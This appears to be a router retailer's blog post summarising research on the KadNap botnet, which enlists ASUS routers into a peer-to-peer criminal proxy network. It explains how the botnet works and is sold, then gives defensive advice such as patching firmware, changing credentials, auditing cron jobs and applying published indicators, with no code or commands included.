Introduction
A newly discovered malware strain called KadNap is quietly turning routers and other edge networking devices into pawns in a global criminal proxy network. Security researchers at Black Lotus Labs, the threat research arm of Lumen Technologies, published findings on the botnet this week after tracking it since August 2025. With over 14,000 devices already compromised and more than 60% of victims located in the United States, this is not a distant threat. If you run an ASUS router or manage a fleet of edge devices, this one deserves your attention.
What Is KadNap?
KadNap is a botnet malware that targets routers and edge networking devices, with a particular focus on ASUS hardware. Once a device is infected, it is silently enrolled into a peer-to-peer network and used as a proxy for routing malicious traffic without the owner’s knowledge. The name comes from the malware’s use of a customized version of the Kademlia Distributed Hash Table (DHT) protocol, the same decentralized architecture used by some file-sharing networks.
This architectural choice is deliberate. Traditional botnets rely on centralized command-and-control (C2) servers, which are relatively easy for security researchers and ISPs to locate and shut down. KadNap’s P2P design means there is no single point of failure. Infected devices locate the C2 infrastructure through the DHT network itself, making it significantly harder to detect, block, and disrupt.
Once active on a device, the malware checks the device’s external IP address, queries Network Time Protocol servers for the current time and system uptime, and then installs a cron job that runs a shell script every hour at the 55-minute mark. The script is renamed “.asusrouter” on infected systems, a naming choice clearly designed to blend in with legitimate ASUS router processes.
Who Is Behind It?
Researchers have linked KadNap to a proxy service called Doppelganger, operating at doppelganger[.]shop, which markets access to infected devices as residential proxies. The service advertises proxies in over 50 countries with claims of complete anonymity, and is believed to be a rebrand of an older proxy service called Faceless, which was previously tied to the TheMoon malware botnet. TheMoon also targeted ASUS routers.
Doppelganger appears to have launched in May or June 2025, and the KadNap malware that feeds it was first detected in the wild in August 2025. Customers of these proxy services use the access for activities like DDoS attacks, credential stuffing campaigns, and brute-force attacks against other targets. The victims hosting this traffic have no idea any of it is happening.
The Scope of the Threat
As of the time of Lumen’s disclosure, KadNap had infected over 14,000 devices. More than 60% are in the United States, with additional infections in Taiwan, Hong Kong, Russia, the United Kingdom, Australia, Brazil, France, Italy, and Spain. Nearly half of the botnet’s infected nodes are connected to C2 infrastructure dedicated specifically to ASUS-based bots, while the rest connect to two separate control servers.
While the current scale may seem modest compared to some botnets, KadNap’s decentralized architecture makes it unusually resilient. Lumen has taken steps to block traffic to KadNap’s known control infrastructure on its own network and has released indicators of compromise (IoCs) to help other providers and security teams do the same.
How Does It Get In?
Black Lotus Labs has not disclosed the exact initial access vector in full detail, but edge devices like routers are typically compromised through a combination of known vulnerabilities in older firmware, exposed management interfaces, and default or weak credentials. Devices running outdated firmware are especially attractive targets because many are never patched after initial deployment.
The attack chain begins with a shell script downloaded from a C2 server. That script creates the persistent cron job and enrolls the device into the P2P network. From that point forward, the device silently forwards traffic for criminal customers while the legitimate owner continues using it normally, completely unaware.
Why This Matters for Cellular and Fleet Connectivity
At 5Gstore, we work with customers who rely on ASUS routers and a wide range of edge devices in demanding deployments: fixed wireless sites, mobile command units, fleet vehicles, remote monitoring, and distributed enterprise environments. Many of these installations involve equipment that is set up once and rarely revisited for maintenance or firmware updates.
That reality is exactly what makes botnets like KadNap dangerous. A router in a remote installation running firmware from 2022 is a prime target. If that device is compromised and enrolled in a proxy botnet, the traffic implications extend beyond just the infected device. Depending on the network topology, a compromised router could become a pivot point for attackers to reach other devices on the same segment.
What You Can Do
The good news is that the core protections here are straightforward, even if they require discipline to execute across a fleet.
Update firmware immediately. ASUS and most major router manufacturers regularly push firmware updates that patch known vulnerabilities. If you have ASUS devices in your environment, log in to the admin console or your management platform and verify each device is running the latest available firmware. Automating firmware updates through a fleet management platform like RouterStatus.net is an effective way to close this gap at scale.
Change default credentials. Any device still running factory-default usernames and passwords is low-hanging fruit for attackers. Every router in your environment should have a unique, strong administrative password.
Disable remote management if not needed. Many router compromises happen through exposed web interfaces or SSH ports accessible from the internet. If you do not need remote access to a device’s management interface from outside your network, disable it. If you do need it, restrict access by IP range or use a VPN.
Audit your cron jobs and running processes. If you manage Linux-based routers and have shell access, check for unexpected cron jobs. KadNap specifically creates a persistent cron job that runs at the 55-minute mark each hour. Any cron job pulling a script from an external IP and running it should be treated as a red flag.
Segment your network. Routers and edge devices should be isolated from sensitive internal systems wherever possible. If a device is compromised, proper segmentation limits what an attacker can reach from that foothold.
Monitor outbound traffic. Unusual outbound connection volume, particularly to unfamiliar IP addresses, can be a sign of proxy traffic being routed through a device. Firewall logging and network flow analysis tools can help surface this.
Use Lumen’s IoC list. Black Lotus Labs has published indicators of compromise for KadNap. If you operate your own firewall or IDS infrastructure, adding these indicators to your block lists is a direct countermeasure.
The Bigger Picture
KadNap is part of a broader and accelerating trend of router-targeting botnets. In late 2025, the Kimwolf botnet compromised over two million Android-based TV boxes and streaming devices, also for use as residential proxies. Earlier threats like TheMoon targeted the same ASUS hardware that KadNap is now going after. These are not isolated incidents. Routers and edge devices have become a preferred attack surface because they are numerous, they are often neglected from a patching standpoint, and they sit at the boundary between a network and the open internet.
As cellular routers and 5G edge devices proliferate across industries, the stakes only increase. A botnet compromise in a fleet of cellular-connected remote monitoring nodes is not just a security problem. It is a reliability problem, a liability problem, and potentially a compliance problem depending on what data flows through those devices.
5Gstore Take
Router security is not optional, and it is not something you can address once and forget. The KadNap botnet is a sharp reminder that even well-known hardware from reputable vendors can be compromised when firmware goes unpatched and default configurations go unchanged. If you are managing ASUS routers or other edge devices and are not sure where your firmware versions stand, that is the place to start today.
If you need help selecting a router with stronger security defaults, evaluating fleet management options, or building out a more defensible network architecture, our team is ready to help. Contact us and we will work through the specifics of your deployment with you.
FAQ
What is the KadNap botnet?
KadNap is a malware strain that infects ASUS routers and other edge networking devices, enrolling them in a peer-to-peer botnet used to proxy malicious internet traffic for criminal customers.
Is my ASUS router at risk from KadNap?
If your ASUS router is running outdated firmware, uses default credentials, or has its management interface exposed to the internet, it is at elevated risk. Updating firmware and changing default passwords are the most important immediate steps.
How does KadNap avoid detection?
KadNap uses a modified version of the Kademlia Distributed Hash Table protocol to communicate in a decentralized, peer-to-peer manner. This makes it harder to find and shut down the C2 servers that control infected devices.
What should I do if I think my router is infected?
Perform a factory reset, update to the latest firmware before reconnecting, change all credentials, and disable remote management unless it is specifically required. Review the indicators of compromise published by Black Lotus Labs and apply them to your security infrastructure.
Does this affect other router brands, or just ASUS?
KadNap has primarily targeted ASUS routers, but researchers note that the malware has also been deployed against other edge networking devices. Any unpatched edge device with weak credentials or exposed management interfaces is a potential target.
